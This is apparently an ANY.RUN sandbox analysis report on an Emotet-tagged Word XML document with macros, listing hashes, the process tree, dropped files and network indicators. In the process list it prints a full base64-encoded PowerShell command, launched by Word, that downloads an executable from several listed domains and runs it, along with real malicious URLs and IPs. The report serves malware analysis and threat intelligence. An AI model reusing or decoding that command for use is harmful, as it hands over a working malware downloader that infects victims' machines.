analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa

Full analysis: https://app.any.run/tasks/78437338-4b6f-4c65-8159-c9fcfba8fc9a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 18, 2019, 13:07:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

D04999E6770DBD70D697171774D9FCA2

SHA1:

BD20AB57085B3216A9B1971C1587B3994EEC539C

SHA256:

847E718FA1DCA436C5F8E20E88BBC016BB163B7EAEEDD68824FF85FAB88F2EFA

SSDEEP:

3072:2gM6pmKZlGHuE6cJW5ZCQY6f8wFMP62h8hqjL/xSu90OoiLuDKZXfwKeljR1l:k6IKbx24ZC7MFSEh4xUOmD+XfwLB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2608)
    • Request from PowerShell which ran from Office

      • Powershell.exe (PID: 3936)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2608)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2948)
    • Creates files in the user directory

      • Powershell.exe (PID: 3936)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2608)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2608)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRT:
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://tuzWAo6FkAUf6
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://tuzWAo6FkAUf6
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 004F5309
WordDocumentBodySectPRsidRDefault: 00853DEC
WordDocumentBodySectPRsidR: 00853DEC
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 107904 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: KPRjpMJ
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 4
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 4
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:08 09:27:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:08 09:27:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msoxmled.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2608"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3936Powershell -e JABJAGYAegBEAHcATQBmAD0AKAAnAFIAJwArACcASgBuAFUAUwBsACcAKQA7ACQAWQBCAG8AYgBmAEUAaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABJAEQAaABvAEoAZABSAHQAPQAoACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwB0ACcAKwAnAHYAYgBpACcAKwAnAGwAZABpACcAKwAnAHIAaQBtAC4AYwBvAG0AJwArACcALwBLAHoAOAA1AE4ASAA2ADUAQABoAHQAdABwACcAKwAnADoALwAvAGUAJwArACcAbAByAGEAYwBvACcAKwAnAHMAZQBjAHIAJwArACcAZQAnACsAJwB0AC4AYwAnACsAJwBvAG0ALwAnACsAJwBkAEIASwBPAFYANgB4ACcAKwAnAG0AQABoACcAKwAnAHQAdABwADoALwAvAHMAZQBnACcAKwAnAHUAJwArACcAcgBpACcAKwAnAGUAJwArACcAeAAnACsAJwBwACcAKwAnAG8AJwArACcAZgBvAHIAbwAuAG8AcgBnACcAKwAnAC8ASAAnACsAJwBYAEoAaAByADgANQBQACcAKwAnAE8AJwArACcAQAAnACsAJwBoAHQAJwArACcAdABwADoAJwArACcALwAvACcAKwAnAHQAaAAnACsAJwBvAGkAdAByAGEAbgBnACcAKwAnAHMAdABhAHUAcAAuACcAKwAnAGMAbwBtAC8AawBDAFgAYgBxAHQASgBYAEcAQABoAHQAdABwACcAKwAnAHMAOgAvAC8AJwArACcAdwB3AHcALgBvAGkAbAByAGUAZgBpAG4AZQByAHkAbABpAG4AZQAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1ACcAKwAnAGQAZQBzAC8AdAA3AGQAJwArACcAdwBpACcAKwAnADYAaQBpAE8ASAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABPAGQASABGAEQAawB0AD0AKAAnAHoAegAnACsAJwBtAG4AbgB2ADEAJwApADsAJABwAEUAZABJAHUAVgByAGoAIAA9ACAAJwA4ADgAJwA7ACQAdQBtADgAMgBCADkAWABXAD0AKAAnAG0ATAAnACsAJwBoAHEAMgBhACcAKQA7ACQAbABxAHcARABoAEUAYQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcABFAGQASQB1AFYAcgBqACsAKAAnAC4AJwArACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQA2AFgAOQBVAFIAMgB0ACAAaQBuACAAJABJAEQAaABvAEoAZABSAHQAKQB7AHQAcgB5AHsAJABZAEIAbwBiAGYARQBpAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFkANgBYADkAVQBSADIAdAAsACAAJABsAHEAdwBEAGgARQBhACkAOwAkAGQARwA1AEYAbwBLAE0AcgA9ACgAJwBrAFgAdwAnACsAJwBQAFAAcQBLACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGwAcQB3AEQAaABFAGEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABsAHEAdwBEAGgARQBhADsAJABqAEYARwBwAE8ANAA9ACgAJwBxAFAAJwArACcANgB2AE0AJwArACcAdAA3AGYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHAAOAB6AG8AVABpADkAcAA9ACgAJwBaADYAMQBqACcAKwAnADAASAAnACsAJwBaACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 811
Read events
1 337
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B1E.tmp.cvr
MD5:
SHA256:
2608WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB9C032A.tmp
MD5:
SHA256:
3936Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DRCW0PQTSGGT2QDJ0ZDL.temp
MD5:
SHA256:
3936Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24758e.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3936Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$7e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xmlpgc
MD5:FF8892CFB2AACA347BF424713DCA72B3
SHA256:D233113F9800CC81A562E02E2F7E71A04AB536EC77FCEE1A5E6926698B7318CB
2608WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:1F3834663FBABC6E0DDE076EC9795AB2
SHA256:E9AC831CBF711513DA3313B5541D7805CB5EA96B88D19D6C3F5BB2A31FE49035
2608WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C6A56A9D54BDC2AEDB4ED18E3587ADA2
SHA256:9DB6C2919BC60A8D104A3ED9594A03768496DF6E7042B2EFDFF48CAEBE08AD19
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3936
Powershell.exe
GET
404
37.148.211.11:80
http://tvbildirim.com/Kz85NH65
TR
html
15.3 Kb
suspicious
3936
Powershell.exe
GET
301
209.240.96.46:80
http://elracosecret.com/dBKOV6xm
US
suspicious
3936
Powershell.exe
GET
404
103.232.121.71:80
http://thoitrangstaup.com/kCXbqtJXG
VN
html
61.1 Kb
unknown
3936
Powershell.exe
GET
301
69.10.135.25:80
http://seguriexpoforo.org/HXJhr85PO
CA
html
379 b
suspicious
3936
Powershell.exe
GET
200
69.10.135.25:80
http://seguriexpoforo.org/HXJhr85PO/
CA
html
379 b
suspicious
3936
Powershell.exe
GET
404
209.240.96.46:80
http://www.elracosecret.com/dBKOV6xm
US
html
14.4 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3936
Powershell.exe
69.10.135.25:80
seguriexpoforo.org
TeraGo Networks Inc.
CA
suspicious
3936
Powershell.exe
37.148.211.11:80
tvbildirim.com
Cizgi Telekomunikasyon Anonim Sirketi
TR
suspicious
3936
Powershell.exe
209.240.96.46:80
elracosecret.com
Turnkey Internet Inc.
US
malicious
3936
Powershell.exe
47.88.29.116:443
www.oilrefineryline.com
Alibaba (China) Technology Co., Ltd.
JP
unknown
3936
Powershell.exe
103.232.121.71:80
thoitrangstaup.com
Viet Solutions Services Trading Company Limited
VN
unknown

DNS requests

Domain
IP
Reputation
tvbildirim.com
  • 37.148.211.11
suspicious
elracosecret.com
  • 209.240.96.46
suspicious
www.elracosecret.com
  • 209.240.96.46
unknown
seguriexpoforo.org
  • 69.10.135.25
suspicious
thoitrangstaup.com
  • 103.232.121.71
unknown
www.oilrefineryline.com
  • 47.88.29.116
unknown

Threats

No threats detected
No debug info